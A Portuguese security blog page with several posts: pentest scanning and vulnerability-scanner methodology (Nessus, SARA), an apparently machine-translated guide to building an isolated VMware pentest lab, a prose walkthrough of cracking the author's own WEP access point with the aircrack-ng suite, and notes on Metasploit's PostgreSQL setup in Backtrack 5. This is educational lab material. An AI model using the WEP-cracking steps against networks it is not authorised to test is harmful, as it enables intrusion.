Também nesta fase do teste podemos incluir diversas ferramentas e tecnicas, conforme o objectivo do teste e a configuração da máquina/rede alvo. Ferramentas deste tipo foram analisadas no ponto 3 deste mesmo relatório.
As ferramentas mais utilizadas para fazer scanning, são:
• telnet –Serve para mostrar informação sobre uma aplicação ou serviço (versão, plataforma.
• nmap – port scanner
• hping2 – port scanner
• netcat – port scanner
• ping – testa conectividade IP
• traceroute – Ele conta os “hops” da rede, desde a máquina em que é executado até à máquina/sistema alvo.
• queso – OS fingerprinting.
1.3- Teste de vulnerabilidade
Os testes de vulnerabilidades consistem na determinação de que buracos de segurança e vulnerabilidades podem ser aplicadas à rede/máquina alvo. Quem efectuar o teste vai tentar identificar nas máquinas na rede alvo todas as portas abertas, sistemas operativos e aplicações a serem executadas; incluindo o sistema operativo, patches aplicados e service packs aplicados.
Nas etapas anteriores, são identificadas as máquinas que estão ligadas e que portas e serviços têm disponíveis.
Existe, na geral quatro categorias de vulnerabilidades que podem ser encontradas:
• Os bugs específicos do sistema operativo, exploits, vulnerabilidades e buracos de segurança
• As fraquezas no firewall e routers, entre diversas marcas
• A exploração de scripts de web server
• As partilhas e confianças exploráveis entre sistemas e pastas.
O scan de vulnerabilidades pode ser feito de várias formas, que indicarei nos pontos seguintes.
1.3.1- Ferramentas e Manuais
As análises das vulnerabilidades de um computador pode ser feita manualmente, com base na informação recolhida nos pontos anteriores. Ou seja, são percorridas as listas de vulnerabilidades existentes, em busca de alguma que possa existir para cada uma das aplicações instaladas na máquina.
1.3.2- Nessus
O Nessus é a melhor ferramenta para inventariar vulnerabilidades com código fonte disponível.
Instalação
Esta ferramenta é constituida por duas partes: o cliente e o servidor, que podem ou não, ser instaladas em máquinas diferentes.
A instalação é bastante simples:
• executa-se a script de instalação
• adiciona-se um utilizador
Utilização
O Nessus tem de ter o servidor instalado numa máquina *IX, mas o cliente pode ser executado em Windows ou em *IX.
O cliente desta ferramenta, pode correr em modo gráfico ou em modo de comando. O modo de comando tem a vantagem de poder ser incluído em scripts, o modo gráfico tem a vantagem de ser facilmente seleccionável quais os testes de vulnerabilidade que são executados.
1.3.3- SARA-Security Auditor’s research assistant
O SARA é um scanner de rede, que procura serviços e os analisa.
Esta ferramenta produz relatórios em diversos formatos: html, XML, interactivos e CSV, importável para folhas de cálculo.
Instalação
A instalação do SARA é muito simples: basta descomprimir o tgz, e executar ./configure, make, make install.
Relativamente à configuração, podem fazer-se algumas configurações específicas, mas deixando tudo o que vem por default, obtêm-se resultados interessantes.
Utilização
O SARA pode ser executado em três modos: interactivo (interface web), linha de comando, ou modo remoto.. No caso presente, optei pelo modo interactivo.
O modo remoto pode ser útil, no caso de se desejar ter o servidor de SARA numa determinada máquina e um cliente gráfico, na própria máquina.
Este modo tem algumas limitações: só é permitido um utilizador de cada vez, um teste não pode ser interrompido, o servidor não foi feito para ficar permanentemente à espera de pedidos, é preciso ter preocupações com a segurança.
Pode ser definido o tipo de “ataque” que é feito à máquina/rede em causa. Pode variar entre cinco níveis de severidade.
1.3.4- Comparação entre detectores de vulnerabilidades
A detecção manual de vulnerabilidades é, com certeza a que permite mais pormenor, mas é muito difícil de ser implementada com perfeição.
Relativamente às duas ferramentas utilizadas, o SARA é, sem dúvida, mais rápida, mas é também a menos eficiente. Além de apresentar resultados muito menos detalhados e não apresentar formas de resolução das vulnerabilidades (como o Nessus), apresenta falsos positivos.
Relativamente à forma de apresentação de resultados, o SARA é muito inferior. O servidor tem ainda problemas de funcionamento, no sentido que entre dois testes, se não for removido, não funciona corretamente.
Tem no entanto, uma funcionalidade interessante, que é ir guardando e apresentando em paralelo os resultados de testes anteriores.
Esta característica pode ser interessante, do ponto de vista de armazenamento de informação sobre todo o parque de servidores de uma empresa, por exemplo.

Fonte: SH

Criando um ambiente de Pentest Laboratório Virtual

Criando um ambiente de laboratório dá ao usuário a oportunidade de explorar novas tecnologias, configurações de teste, métodos de exploração de teste, criar scripts e muito mais. É por isso que a criação de um ambiente de laboratório é uma tarefa imperativa. Neste artigo, vou passar por cima de construção de ambientes de laboratório específicos para testes de penetração. No entanto, qualquer um poderia modificar essas diretrizes de laboratório e criar seu próprio ambiente de laboratório específico. Este artigo não é um guia definitivo sobre como configurar um ambiente de laboratório para atender às necessidades de todos. Em vez disso, é uma visão geral de como iniciar uma penetração ambiente de laboratório de testes.
Um ambiente de laboratório é necessário aprender técnicas específicas de testes de penetração que seria ilegal se não for dada permissão específica para testar os sistemas públicos de enfrentar. Assim, a criação de um ambiente privado de sua própria em que você pode lançar qualquer ataque, ferramenta, explorar e fazer o que quiser dentro do ambiente é essencial para o processo de aprendizagem, além de que é muito divertido. Outra razão para um pentest laboratório é se você está encarregado de um teste de penetração de um cliente, e não estão familiarizados com um exploit que um de seus sistemas podem ser vulneráveis ​​também, então você pode configurar um sistema de teste que reflete a configuração do cliente original do sistema para o melhor de seu conhecimento para testar e / ou reescrever o exploit para ter certeza que funciona como descrito. Em outra nota, pessoalmente eu gosto de re-escrever todas as explorações que não estão diretamente portados dentro de um quadro de exploração. Isto assegura que o exploit faz e executa exatamente como eu quero isso também, além disso ele me dá paz de espírito para saber o que o shellcode dentro do exploit faz. No entanto, isso está fora do âmbito deste artigo.
O laboratório pode ser pequena ou grande, mas dá-lhe a capacidade de executar vários sistemas operacionais, configurações diferentes, e software para testar. Virtualização faz um excelente ambiente de laboratório e reduz a necessidade de um monte de hardware. Existem muitas soluções de virtualização no mercado hoje. No entanto, na minha opinião os produtos da VMware são os melhores. Eu posso ser suspeito desde que comecei com a VMware para isso, o artigo será focado no uso da tecnologia VMware desde todos os meus laboratórios são a instalação no VMware.
Dependendo da configuração, no mínimo, você deve ter uma caixa específica ou se você não quiser ir a rota dedicado no desktop ou laptop rodando seu laboratório deve ser capaz de executar pelo menos 2-3 máquinas virtuais consecutivamente, sem degradar o desempenho do seu sistema e tornando-o inutilizável. Dentro de ambientes meu laboratório, eu tenho dois servidores dedicados, cada um com 12GB de RAM rodando o VMware ESXi 3.5 e 4.0. No entanto, você não precisa de uma configuração como esta, se você só quer também configurar um par de máquinas virtuais para começar a testar e contra. Eu tenho um ambiente de laboratório VMware estação de trabalho na minha área de trabalho, bem como com 8GB de RAM. Além disso, como eu viajo muito eu instalei 8GB ou carneiro no meu laptop para que eu possa testar contra VM localmente, se necessário, enquanto em um site do cliente ou em um quarto de hotel.
Dito isto eu sugiro que você comece com VMware estação de trabalho ou servidor. Estação de trabalho é muito mais robusto, em seguida, o servidor VMware, no entanto, não é livre como servidor VMware edição. Cabe também que a plataforma de virtualização que você quer também correr. No entanto, se você é um estudante VMware não oferece descontos educacionais para VMware Workstation e Fusion (Se você tem um Mac).
VMware Workstation e fusão também dá ao usuário a capacidade de escolher o tipo de rede que você quer também permitir no host. Há três opções de padrão, em ponte, NAT e anfitriã. Aqui estão algumas definições de alto nível dos três tipos de redes. (Para mais informações, leia a documentação do VMware)
Networking ponte - Atribui o sistema convidado um endereço IP dentro da LAN física que o host está ligado.
NAT - Usa tradução de endereços de rede para atribuir o convidado de um endereço IP NATed que pode chegar a sua rede local e à Internet através de sua conexão de internet hosts.
Host-only - irá atribuir um endereço IP para o hóspede que só é acessível no sistema host. Host-only basicamente caixas de areia da rede para o seu host, você não será capaz de acessar a Internet ou quaisquer recursos na LAN que o anfitrião está ligado.
Isso é bom, uma vez que lhe dá muitas opções para o seu acolhimento. No entanto, eu sugiro ficar com host-somente ao executar façanhas ou teste de malware dentro do seu ambiente de laboratório. Isto irá restringir as façanhas de uma rede de modo seguro eo exploit ou malware não terá a capacidade de acessar os recursos em sua rede de produção.
Outra coisa a considerar é que para obter imagens ISO de sistemas operacionais que você quer também instalar para jogar com ou contra a testar. Para a Microsoft constrói este pode ser caro. No entanto, sugiro uma assinatura technet profissional, que irá permitir que você baixe o sistema operacional da Microsoft iso para fins de desenvolvimento. Além disso, você vai querer uma variedade de configuração da VM para testar exploits e ferramentas diferentes contra. Pelo menos a configuração das máquinas vítima a seguir dentro de você ambiente de laboratório:
Windows XP SP2
Windows XP SP3
Windows Vista
Windows 7
Windows Server 2003
Windows Server 2008
Server 2008 R2
Vários sabores de Linux eu gosto Ubuntu e CentOS
PfSense ou Monowall Firewall (Opcional)
BT4 e Soon BT5 (Atacante)
Isto lhe dará muitas metas dentro do seu ambiente, que você pode testar contra. Bem como, uma caixa de atacar, adoro voltar atrás, e os caras que fazem a distribuição linux backtrack possível fazer um trabalho fenomenal. Backtrack é minha caixa preferencial de ataque dentro do meu laboratório e durante a realização de testes de penetração da vida real. É altamente recomendável uma vez que tem a maioria das ferramentas que você precisa para aprender e conhecer intimamente pré-instalado.
Para acrescentar, uma vez que você tem todo o seu teste de configuração de máquinas vítima. Eu sugiro que você armazená-los e fazer clones e instantâneos dos sistemas esta lhe permitirá reverter os sistemas se eles se hosed ou corrompido. Clones também vem a calhar quando a necessidade de instalar software vulnerável novo no sistema. Clones permitir-lhe apenas clonar uma máquina virtual existente, em vez de ter que instalar um sistema operacional a partir do zero, poupando assim tempo precioso.
No geral, ter um ambiente de laboratório virtual para fins de teste pode ir um longo caminho, bem como, permitir que você aprenda muitas tarefas e métodos que você pode não ter usado antes. Dentro de seu ambiente de laboratório, você está limitado apenas pela sua mente. Espero que tenham gostado do meu visão geral de alto nível da criação de um ambiente de laboratório básico, ea idéia principal é aprender e se divertir ao mesmo tempo aprender novas tecnologias e metodologias de testes. Eu espero que você aprendeu como é importante ter um ambiente de laboratório virtual poderia ser profissionalmente e pessoalmente você pode aprender muito e realmente ver quantos tipos de tecnologia e sistemas de trabalho operacional e de como eles são diferentes. Portanto, divirta-se, a instalação de um laboratório bom e eu esperava que este artigo vai ajudá-lo. Até a próxima =)

Backtrack 5 Injeção sem fio com Alfa AWUS051NH Cartão

Para resumir tudo isso se eu realmente queria tentar a minha Alfa AWUS051NH cartão USB com a distro BT5 novo. Injeção funcionou perfeitamente e eu era capaz de quebrar meu seclab WAP WEP ativado dentro de alguns minutos de injeção. No entanto, essa era uma chave WEP de 64 bits, criptografia mais forte vai demorar um pouco mais longo e IV de crack. Permite obter este curso.
A configuração:
BT5 KDE x32 - Máquina Virtual
Alfa AWUS051NH de cartão USB
Ponto de Acesso Wireless execução WEP
Os resultados:
Alfa AWUS051NH no modo monitor.
Iniciar o airodump-ng para ver onde meu AP é.
Airodump-ng comando refinado especificando o BSSID e canal do meu alvo AP. (Não eles) =)
Agora para iniciar a injeção ARP usando aireplay-ng enquanto airodump-ng é capturar apenas pacotes IV.
E agora, para o que todo mundo está esperando por =) Cracking a chave WEP, usando aircrack-ng.

Backtrack 5, Metasploit, e PostgreSQL

Backtrack 5 vem com algumas funcionalidades muito interessantes, no entanto, estarei discutindo Metasploit e PostgreSQL dentro deste post. Backtrack 5 navios com metasploit e PostgreSQL fora da caixa, o que significa que o postgres já está em execução dentro BT5.
Uma coisa a observar aqui é que você pode precisar instalar a gem postgres e especificar o db_driver dentro de MSF. Eu instalei a gema usando Ruby versão 1.8.7, erros de instalação da gema postgres usando Ruby 1.9.2_dev versão. Há alguns muito bom como-a para este cargo nos BT5 fóruns. Atualização 6/1/2011 - MSF não contém os drivers do postgres se lançado a partir de '/ pentest/exploits/framework3', no entanto, se lançou de você caminho, então os drivers estão disponíveis e PostgreSQL é inicializado e conectado. No entanto, não está sendo executado no padrão 5432 tcp porta, em vez postgres está rodando em localhost: 7175. Uma rápida 'netstat-ANTP | grep 7175' comando será exibido se qualquer serviço está sendo executado em uma porta.
Mas, se nós tentamos parar o serviço postgres usando / etc/init.d/postgresql-8.4 parada, ficamos sem sorte nenhum serviço está sendo executado chamado PostgreSQL-8.4. Hmm, permite exibir todos os serviços com o "serviço-status-all 'comando. Nós vemos o seguinte, o que indica que a instalação do PostgreSQL é associado com msf por padrão dentro BT5. Como podemos ver este serviço é chamado de "quadro-postgres AGRADÁVEL =)
O que isso significa, significa que sabemos o nome do serviço para que possamos iniciar e parar o serviço, pare de execução automática na inicialização, e sabemos que a instalação do postgres está associada principalmente com metasploit. Mas hey, os arquivos de configuração do postgres não estão lá local padrão. Bem ok, letf encontrar onde eles estão. Vamos começar com metasploit onde está instalado. o diretório 'framework3 dentro dos' / pentest / exploits / 'diretório é um link simbólico para' / opt/framework3/msf3 '. Por isso, olhar para dentro desses diretórios e ver um diretório dentro do diretório do postgresql 'opt/framework3 /'. No entanto, se começarmos metasploit e tentar se conectar ao banco de dados com usuário e senha de 'root: toor "teremos um erro de autenticação. Então, qual é o usuário e senha de combinação usado?
Depois de passar por alguns dos diretórios dentro do diretório '/ opt/framework3', acho interessante um diretório chamado config que tem um arquivo chamado 'database.yml' dentro dele. Vamos gato o conteúdo do arquivo e ver o que ele nos diz. Como podemos ver na imagem abaixo, diz-nos o nome de usuário e senha. Informações Nice, no entanto, em vez de especificar o nome de usuário e senha toda vez que nos conectar a MSF e quiser usar o banco de dados PostgreSQL, podemos usar o comando 'db_connect com o arquivo database.yml.
Como podemos ver, temos um nome de usuário e uma senha msf gerado aleatoriamente. Estou executando alguns diferentes BT5 máquinas virtuais e cada um tem uma senha diferente. Nice. Agora, para se conectar ao banco de dados msf é só usar o comando db_connect com a sintaxe direito de usar o arquivo yml, com o caminho absoluto para o arquivo especificado.
Agora estamos no negócio. Eu achei que iria fazer um pouco de escrever-se sobre isso desde que eu não tenha visto um monte de documentação para este lugar, espero que gostem. Para ser honesto, eu estou achando mais e mais funcionalidades muito interessantes os desenvolvedores BT5 introduzidas. 
← Postagens mais recentes Postagens mais antigas → Página inicial
Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86